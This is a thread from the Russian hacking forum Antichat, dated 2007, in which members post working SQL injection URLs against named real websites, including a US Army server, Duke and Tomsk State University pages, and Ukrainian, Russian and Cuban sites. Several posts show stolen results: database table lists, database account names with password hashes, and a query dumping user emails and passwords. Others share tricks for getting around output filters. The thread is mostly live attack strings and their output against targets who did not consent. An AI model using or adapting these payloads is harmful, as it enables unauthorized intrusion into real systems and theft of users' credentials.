ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2501  
Старый 14.06.2007, 03:37
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www4.army.mil
Код:
http://www4.army.mil/otf/eCal.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3b,user(),database(),version()),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
С вас пицот у.е =)
 
Ответить с цитированием

  #2502  
Старый 14.06.2007, 08:23
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://www.imperialauto.kz/?page=good_info&id=-2+union+select+1,version(),3,4+from+news/*
 
Ответить с цитированием

  #2503  
Старый 14.06.2007, 11:41
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://www.tectonic.co.za/view.php?id=1562+and+ascii(lower(substring(version(),1,1)))=0x34
 
Ответить с цитированием

  #2504  
Старый 14.06.2007, 13:43
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

улыбнул вывод данных
Код:
http://www.mfd.ru/content.asp?code=2+or+1=(select+top+1+table_name+from+information_schema.tables)--
табл:
Код:
Anketa
banBanners
BankRevolution
banSystems
banUsers
cfgBlocks
cfgChapters
cfgContent
cfgDates
cfgFields
cmtChapters
cmtCommentsViewGeneral
cmtCommentsViewMood
cmtInternal
cmtSource
cmtStream
comment_dates_view
comments
commentsAnother
commentsArc
ctsv_01E0DC7DA24B418AB04757A54FA4992E
ctsv_0C65853E3F3D4456BCE0F66B2FC5BC57
ctsv_266AB0DBF03B45CFA299C8D43260FD70
ctsv_2A8342AADF704B2291CA562D742C43FE
ctsv_53997158E8364D339560D8ACE5A4ADCF
ctsv_64CAEC4BBD124DCE98C36B9239948F97
ctsv_A89FCD59D9024E26AC9B8EECF473AE29
ctsv_D0D9FB8A3F054A82948C465F27371818
dtproperties
dtThemes
GrfxView
Locator
MfdUsers
mrktInformerSubscriber
MSdynamicsnapshotjobs
MSdynamicsnapshotviews
MSmerge_altsyncpartners
MSmerge_contents
MSmerge_delete_conflicts
MSmerge_errorlineage
MSmerge_genhistory
MSmerge_replinfo
MSmerge_tombstone
MSrepl_identity_range
MSreplication_subscriptions
MSsubscription_agents
news
newstoc
qstAnswers
qstQuestions
qstVariants
Questionary
Questions
Rating
Subscribes NEWS
sysconstraints
sysmergearticles
sysmergeextendedarticlesview
sysmergepublications
sysmergeschemaarticles
sysmergeschemachange
sysmergesubscriptions
sysmergesubsetfilters
syssegments
tAnonce
tBI_Client
tBI_Total
tDocument
tempGrfx1
tempGrfx2
textadv
tFnews
tForum
tForumMember
tForumMsg
tForumMsgState
tForumRole
tForumRoleLnk
tForumStatus
tForumType
tGenerator
TickerLocator
tMacroIndexType
tMacroIndexUSD
tResources
tRotateNews
tsvw_01E0DC7DA24B418AB04757A54FA4992E
tsvw_0C65853E3F3D4456BCE0F66B2FC5BC57
tsvw_266AB0DBF03B45CFA299C8D43260FD70
tsvw_2A8342AADF704B2291CA562D742C43FE
tsvw_53997158E8364D339560D8ACE5A4ADCF
tsvw_64CAEC4BBD124DCE98C36B9239948F97
tsvw_A89FCD59D9024E26AC9B8EECF473AE29
tsvw_D0D9FB8A3F054A82948C465F27371818
tUserValue
UserTable
бабах! =)
Код:
http://www.km.ru/tests/tests.asp?code=9+or+1=@@version--
 
Ответить с цитированием

  #2505  
Старый 14.06.2007, 20:11
Аватар для hitex
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Код:
http://sibrc.tsu.ru/region_center.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,concat_ws(0x203a20,version(),user(),database()),33/*
http://edu.tsu.ru/index.php?sub=9&page=res&subpage=info&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3b20,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x203a20,id,fio,email,status,name,password),23,24,25,27+from+login+limit+0,50/*
поле с логинами не осилил =\
 
Ответить с цитированием

  #2506  
Старый 14.06.2007, 21:07
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

http://news.mc.duke.edu/ - PR 7
Код:
 
http://news.mc.duke.edu/news/article.php?id=-9863+union+select+user(),2,3,4,5,password,7,8+from+mysql.user/*
User: web
Password(хеш): 623460e26f081bbc



http://stmarys-ca.edu/ - PR 6
Код:
http://stmarys-ca.edu/news_events/news/viewstory.php?id=-92+union+select+1,2,3,4,user(),6,7,password,9,10,11,12,13,14+from+my
sql.user/*
User: webdb
Password(хеш): 456791a12266fca0

Последний раз редактировалось Ky3bMu4; 14.06.2007 в 21:43..
 
Ответить с цитированием

  #2507  
Старый 15.06.2007, 02:01
Аватар для Hawkins
Hawkins
Участник форума
Регистрация: 24.01.2007
Сообщений: 129
Провел на форуме:
932592

Репутация: 145
Отправить сообщение для Hawkins с помощью ICQ
По умолчанию

Проблемы с выводом...кодировку пытался менять - не помогло.
http://www.kiel.ru/?news=-4+union+select+1,2,3,4,5,6/*
 
Ответить с цитированием

  #2508  
Старый 15.06.2007, 02:07
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
Проблемы с выводом...кодировку пытался менять - не помогло.
http://www.kiel.ru/?news=-4+union+select+1,2,3,4,5,6/*
http://www.kiel.ru/?news=-4+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x71),0x71),4,5,6/*
 
Ответить с цитированием

  #2509  
Старый 15.06.2007, 02:36
Аватар для hitex
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Код:
http://www.leki.med.pl/lek.phtml?id=0+union+select+aes_decrypt(aes_encrypt(concat_ws(0x203a20,version(),user(),database()),324),324)/*&idnlek=255&menu=3
http://www.voyage-luxe.ru/chapter64.html?uid=-4+union+select+concat_ws(0x3a,version(),user(),database()),2/*
 
Ответить с цитированием

  #2510  
Старый 15.06.2007, 05:45
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Харцызский Трубный Завод
Код:
http://www.ukrpipe.com.ua/RUS/news.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables/*
Всеукраинская техническая газета
Код:
http://www.vtg.lg.ua/index.php?year=2006&id=-41+union+select+version(),user(),database(),4,5/*
Код:
http://www.cubatravel.cu/client/products/products.php?id=-3+union+select+user(),2/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ